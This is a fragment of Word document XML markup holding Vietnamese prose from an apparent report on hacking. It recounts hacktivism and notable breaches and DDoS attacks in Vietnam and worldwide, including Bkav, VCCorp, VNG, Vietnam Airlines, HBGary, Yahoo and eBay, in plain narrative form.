          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">.2. "Hacktivism" nổi dậy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6759FF" w14:textId="0CC648B9" w:rsidR="00CD1997" w:rsidRPr="00C73388" w:rsidRDefault="00CD1997"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Hacktivism là thuật ngữ diễn tả hành động tấn công, đột nhập vào một hệ thống máy tính nhằm mục đích chính trị. Trên thế giới hiện nay, những nhóm hacker mang "mác" hacktivism nổi tiếng có thể kể đến bao gồm Anonymous, LulzSec (đã gác kiếm), hay TeaMp0isoN. Trong suốt năm 2011 qua, các nhóm hacktivism đã tiến hành nhiều hoạt động khác nhau chống lại các cơ quan luật pháp, ngân hàng, chính phủ, các công ty bảo mật và những nhà cung cấp phần mềm như tấn công lỗ thủng an ninh các hệ thống của Tổ chức Liên hiệp quốc (UN), cơ quan tình báo bảo mật Straffor, CIA… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E0EC2"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15A8F5BB" w14:textId="1F318562" w:rsidR="00CD1997"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CD1997" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">.3. Các cuộc tấn công lớn </w:t>
      </w:r>
      <w:r w:rsidR="00941B83" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">khác </w:t>
      </w:r>
      <w:r w:rsidR="00CD1997" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ở Việt Nam:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF4FA4" w14:textId="4D3D0FA2" w:rsidR="00CD1997"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941B83" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.3.1. Cuộc tấn công vào năm 2012</w:t>
      </w:r>
      <w:r w:rsidR="007434F9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> của Bkav</w:t>
      </w:r>
      <w:r w:rsidR="00941B83" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A28CF" w14:textId="70F137B8" w:rsidR="00941B83" w:rsidRPr="00C73388" w:rsidRDefault="00941B8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Tháng 2/2012 Website bị deface, lộ hơn 100.000 địa chỉ email, mật khẩu diễn đàn, xuất hiện nhiều bài viết công kích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421D4E6" w14:textId="77777777" w:rsidR="00941B83" w:rsidRPr="00C73388" w:rsidRDefault="00941B83" w:rsidP="00CD1997">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F38893" w14:textId="26B1A28D" w:rsidR="00941B83" w:rsidRPr="00C73388" w:rsidRDefault="00941B8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ài 13/02/2012, nhóm hacker tự nhiện là “Anoymous/LulzSec Việt Nam” đã tấn công diễn đàn Bkav và công khai toàn bộ dữ liệu của diễn đàn bao gồm hơn 100.000 địa chỉ email và toàn bộ dữ liệu cho đến tháng 02/2012. Ngày 24/02/2012, các hacker công bố 8 lỗi bảo mật nghiêm trọng trong hệ thống web của công ty trên một blog. Tuy nhiên, đại diện từ</w:t>
      </w:r>
      <w:r w:rsidR="00FF0DE3" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bkav đã khắng định thông tin về số lỗ hổng này không xác định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7643EB95"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07B5B299" w14:textId="67C3384D" w:rsidR="00FF0DE3"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FF0DE3" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.3.2 Cuộc tấn công vào năm 2014</w:t>
      </w:r>
      <w:r w:rsidR="007434F9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> của VCCrop</w:t>
      </w:r>
      <w:r w:rsidR="00FF0DE3" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F78EA91" w14:textId="0346D925" w:rsidR="00FF0DE3" w:rsidRPr="00C73388" w:rsidRDefault="00FF0DE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Nhiều website lớn của Kênh14, Gamek, Genk, CafeF và một số website do VCCorp vận hành kỹ thuật như Dân Trí, Soha, Người Lao Động… ngưng hoạt động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF5EE7"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5D9F4EA0" w14:textId="5CA309D7" w:rsidR="00FF0DE3" w:rsidRPr="00C73388" w:rsidRDefault="00FF0DE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Trong khoảng 17-18/10, các website thuộc sở hữu của VCCorp và các đối tác công ty này liên tục không thể truy cập hoặc chuyển hướng về blog “VCCorp truyện”với nhiều thông tin tiêu cực về VCCrop. Báo Bantri và VnEconomy liên tiếp bị gián đoạn. Website giadinh.net nghi ngờ bị hacker xoá toàn bộ dữ liệu trên máy chủ. Sự cố đã gây thiệt hại cho VCCorp hàng chục tỷ đồng cà được coi như nghiêm trọng nhất từ ngày xảy ra cho đến nay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB46568"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75BD6CBF" w14:textId="775812AE" w:rsidR="00FF0DE3"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FF0DE3" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.3.3 Cuộc tấn công vào năm 2015</w:t>
      </w:r>
      <w:r w:rsidR="007434F9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> của VNG</w:t>
      </w:r>
      <w:r w:rsidR="00FF0DE3" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D95FAB0"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197DB1A4" w14:textId="50BC0E6F" w:rsidR="00FF0DE3" w:rsidRPr="00C73388" w:rsidRDefault="00FF0DE3"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Ảnh hưởng đế</w:t>
      </w:r>
      <w:r w:rsidR="007434F9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>n thông tin cá nhân 163</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> triệu người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A74F4" w14:textId="77777777" w:rsidR="00FF0DE3" w:rsidRPr="00C73388" w:rsidRDefault="00FF0DE3" w:rsidP="00CD1997">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4088BE8F" w14:textId="7DB3325D" w:rsidR="00FF0DE3" w:rsidRPr="00C73388" w:rsidRDefault="007434F9"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ào ngày 26/4/</w:t>
      </w:r>
      <w:r w:rsidR="00FF0DE3" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>2018, hơn 163 triệu tài khoản Zing ID bị phát hiện được rao bán trên một diễn đàn nước ngoài. VNG xác nhận sự kiện này xảy ta từ năm 2015 nhưng đã không có hành đồng công bố vụ việc, Các dữ liệu bị lộ gồm mật khẩu, tên đăng nhậ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>p, mã game, email, số điện thoại, họ tên đầy đủ, ngày sinh, địa chỉ, IP…Dữ liệu mật khẩu bị lộ được cộng đồng bảo mật đánh giá đã được mã hoá sơ sài và dễ dàng bị giải mã bởi hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B516A6" w14:textId="77777777" w:rsidR="00241540" w:rsidRPr="00C73388" w:rsidRDefault="00241540" w:rsidP="00CD1997">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15BC8E7E" w14:textId="6DA1D10B" w:rsidR="007434F9"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5</w:t>
      </w:r>
      <w:r w:rsidR="007434F9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.3.4 Cuộc tấn công vào năm 2016 của Airlines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF74D9F" w14:textId="66C3F42E" w:rsidR="007434F9" w:rsidRPr="00C73388" w:rsidRDefault="007434F9"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Ảnh hưởng đến thông tin của 411.000 người dùng, chiếm đoạt hệ thống thông báo sân bay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312794B" w14:textId="77777777" w:rsidR="007434F9" w:rsidRPr="00C73388" w:rsidRDefault="007434F9" w:rsidP="00CD1997">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067B82EC" w14:textId="510E3059" w:rsidR="007434F9" w:rsidRPr="00C73388" w:rsidRDefault="007434F9"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Chiều ngày 29/07/2019, một số màn hình hiện thị thông tin chuyên bay của các Sân bay quốc tế Tân Sơn Nhất, Nội Bài, Đà Nẵng, Sân bay Phú Quốc bị chèn những nội dung xúc phạm Việt Nam và Philippines, xuyên tạc các nội dung về biển Đông. Website của Vietnam Airlines bị điều hướng đến trang khác và tiết lộ dữ liệu của 411.000 thành viên Golden Lotus – phần lớn các lãnh đạo, quản lý cơ quan nhà nước, ngân hàng, doanh nghiệp lớn…Những thông tin trong file bao gồm họ tên, ngày sinh, địa chỉ thường trú, đơn vị làm việc, số điện thoại, quốc tịch, ngày tham gia chương trình, điểm tích luỹ, mật khẩu GLP và có nguy cơ hacker giữ lại không công bố </w:t>
      </w:r>
      <w:r w:rsidR="00DD1C7A" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>số thẻ ứng dụng. Hơn 1000 chuyến bay bị ảnh hưởng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D51186" w14:textId="77777777" w:rsidR="00DD1C7A" w:rsidRPr="00C73388" w:rsidRDefault="00DD1C7A" w:rsidP="00CD1997">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2861AB0A" w14:textId="117CB5DE" w:rsidR="00DD1C7A" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="00CD1997">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6</w:t>
      </w:r>
      <w:r w:rsidR="00241540" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>. Các cuộc tấn công trên thế giới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170EE211" w14:textId="26D4BEA4" w:rsidR="00F458C4" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="00F458C4">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6</w:t>
      </w:r>
      <w:r w:rsidR="00F458C4" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">.1. Công ty cung cấp giải pháp bảo mật cho chính phủ Hoa Kỳ bị tấn công </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4DDEE8" w14:textId="77777777" w:rsidR="00F458C4" w:rsidRPr="00C73388" w:rsidRDefault="00F458C4" w:rsidP="00F458C4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7184760E" w14:textId="2BCD7E05" w:rsidR="00F458C4" w:rsidRPr="00C73388" w:rsidRDefault="00F458C4" w:rsidP="00F458C4">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Vào tháng 1-2011, những hacker thuộc Anonymous đã đột nhập máy chủ web của HBGary Federal – hbgaryfederal.com – thông qua việc sử dụng những đoạn mã SQL bất hợp pháp nhằm khai thác một lỗ hổng bảo mật tồn tại trong cơ sở dữ liệu của một ứng dụng. Sau đó trích xuất mã MD5 cho các mật khẩu thuộc sở hữu của giám đốc điều hành (CEO), Aaron Barr, và COO, Ted Vera. Cả hai đều dùng mật khẩu rất đơn giản: 6 kí tự thường và 2 con số. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568620F" w14:textId="77777777" w:rsidR="00F458C4" w:rsidRPr="00C73388" w:rsidRDefault="00F458C4" w:rsidP="00F458C4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D9F12E" w14:textId="3E34408B" w:rsidR="00F458C4" w:rsidRPr="00C73388" w:rsidRDefault="00F458C4" w:rsidP="00F458C4">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Những mật khẩu như thế này cho phép những kẻ tấn công tiếp cận vào những tài liệu nghiên cứu của công ty và hàng chục ngàn email được lưu trữ trong Google Apps. Như vậy, việc sử dụng những mật khẩu thiếu an toàn cho hệ thống phần mềm cũ cộng với việc sử dụng điện toán đám mây đã gây ra cơn ác mộng đối với an ninh bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE08CD1" w14:textId="77777777" w:rsidR="00CD1997" w:rsidRPr="00C73388" w:rsidRDefault="00CD1997" w:rsidP="00CD1997">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BA4600" w14:textId="534437C9" w:rsidR="008E37D5" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A"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126DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F458C4" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">.2. </w:t>
      </w:r>
      <w:r w:rsidR="008E37D5" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Các cuộc tấn công nổi tiếng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6746B803" w14:textId="1B2137D2"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háng 2/2001, máy chủ của Cục tài chính Ireland bị một số sinh viên Đại học Maynooth ở nước này tấn công DDoS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770DE4F2"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0103FE16" w14:textId="3B389F56"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15/8/2003, Microsoft chịu đợt tấn công DoS cực mạnh và làm gián đoạn websites trong vòng 2 giờ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064572F9"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p>
    <w:p w14:paraId="15A1D64F" w14:textId="287E3B7F"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háng 2/2007, hơn 10.000 máy chủ của game trực tuyến như Return to Castle Wolfenstein, Halo, Counter-Strike …bị nhóm RUS tấn công với hệ thống điều khiển chủ yếu đặt tại Nga, Uzbekistan và Belarus. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E790A"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5BB8C4F0" w14:textId="7B1F91D5"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rong suốt các tuần đầu của cuộc chiến Nam Ossetia 2008, các trang web của chính phủ Georgia luôn trong tình trạng quá tải, gồm các trang web ngân hàng quốc gia và của tổng thống Georgia Mikhail Saakashvili. Chính phủ Nga phủ nhận mọi sự cáo buộc cho rằng họ đứng đằng sau vụ tấn công. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B36DF" w14:textId="01E7A954" w:rsidR="00D1545A" w:rsidRPr="00C73388" w:rsidRDefault="00D1545A" w:rsidP="008E37D5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0598022B"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Tháng 8/2009, các vụ DDoS nhắm tới một loạt trang mạng xã hội đình đám </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E3474" w14:textId="13178A73"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như Facebook, Twitter, LiveJournal và một số website của Google được thực hiện chỉ để "khóa miệng" một blogger có tên Cyxymu ở Georgia </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D982C"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2A2EF029" w14:textId="3CAF6022"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28/11/2010, WikiLeaks bị tê liệt vì DDoS ngay khi họ chuẩn bị tung ra những tài liệu mật của chính phủ Mỹ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779B19B"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4886C711" w14:textId="19849ACE"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7/12/2010, nhóm hacker có tên Anonymous đánh sập website Visa.com sau khi tổ chức những cuộc tấn công tương tự vào Mastercard và PayPal để trả đũa cho việc chủ WikiLeaks bị tạm giam ở Anh. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636E4EF"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758FA8D8" w14:textId="42F9778C"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Ngày 3/3/2011, dịch vụ blog nổi tiếng thế giới WordPress bị tấn công. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F136BE" w14:textId="77777777" w:rsidR="008E37D5" w:rsidRPr="00C73388" w:rsidRDefault="008E37D5" w:rsidP="008E37D5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1514BE" w14:textId="5490F12C" w:rsidR="008E37D5" w:rsidRPr="00C73388" w:rsidRDefault="008E37D5" w:rsidP="008E37D5">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Ngày 4/3/2011, 40 trang web của các cơ quan chính phủ Hàn Quốc bị tê liệt vì DDoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E9FA6" w14:textId="77777777" w:rsidR="00DE361D" w:rsidRPr="00C73388" w:rsidRDefault="00DE361D" w:rsidP="00DE361D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5781100E" w14:textId="5A60E583"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Năm 2013 – 2014. Ảnh hưởng đến: 3 tỉ tài khoản người dùng. Tại thời điểm tháng 9 năm 2016, khi Yahoo đang thương lượng việc bán lại cho Verizon, công ty này đã công bố thông tin về vụ lộ dữ liệu lớn nhất trong lịch sử – xảy ra từ năm 2014 với 500 triệu tài khoản bị ảnh hưởng. Chẳng bao lâu sau, Yahoo cập nhật thêm thông tin về một cuộc tấn công mạng khác vào năm 2013 với số tài khoản bị ảnh hưởng lên đến 1 tỉ. Lần này không chỉ tên, ngày sinh, địa chỉ email và mật khẩu (không được mã hóa chặt chẽ) mà cả câu hỏi bảo mật và đáp án cũng bị đánh cắp. Đến tháng 10 năm 2017, số lượng tài khoản bị ảnh hưởng cuối cùng cũng được chốt: 3 tỉ tài khoản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5251C947" w14:textId="77777777"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p>
    <w:p w14:paraId="26A377D8" w14:textId="0AB5B0EC"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Tháng 5/2014. Ảnh hưởng đến: 145 triệu tài khoản. Những hacker thực hiện cuộc tấn công mạng vào trang thương mại trực tuyến này đã xâm nhập vào hệ thống của eBay qua tài khoản của 3 nhân viên và có quyền truy cập nội bộ trong suốt 229 ngày. Toàn bộ 145 triệu người dùng bị lộ thông tin tài khoản bao gồm tên, địa chỉ, ngày sinh và mật khẩu đã mã hóa. Tuy thông tin thanh toán được lưu trữ riêng và không bị đánh cắp, eBay vẫn chịu sự chỉ trích vì đã không cảnh báo người dùng một cách rõ ràng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751040E" w14:textId="77777777"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p>
    <w:p w14:paraId="7A15815F" w14:textId="6FA848AA" w:rsidR="008E37D5" w:rsidRPr="00C73388" w:rsidRDefault="008E37D5" w:rsidP="008E37D5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tháng 10/2016. Ảnh hưởng đến: hơn 412,2 triệu tài khoản. Mạng xã hội FriendFinder bao gồm các trang kết bạn và có nội dung người lớn (bao gồm Adult Friend Finder) đã bị lộ thông tin người dùng vào khoảng giữa tháng 10/2016. Dữ liệu trong 20 năm hoạt động bị mất trong cuộc tấn công mạng này bao gồm tên, địa chỉ email và mật khẩu. Do mã hóa không chặt chẽ, gần như toàn bộ số mật khẩu này đã bị giải mã tại thời điểm bài phân tích về số dữ liệu trên được đăng trên LeakedSource.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7A75A" w14:textId="77777777" w:rsidR="00E25D4C" w:rsidRPr="00C73388" w:rsidRDefault="00E25D4C" w:rsidP="00E25D4C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CBE8F6" w14:textId="3DF46F85" w:rsidR="00E25D4C" w:rsidRPr="00C73388" w:rsidRDefault="00805D0B" w:rsidP="00E25D4C">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 TỔNG QUAN VỀ HACKING.</w:t>
      </w:r>
    </w:p>
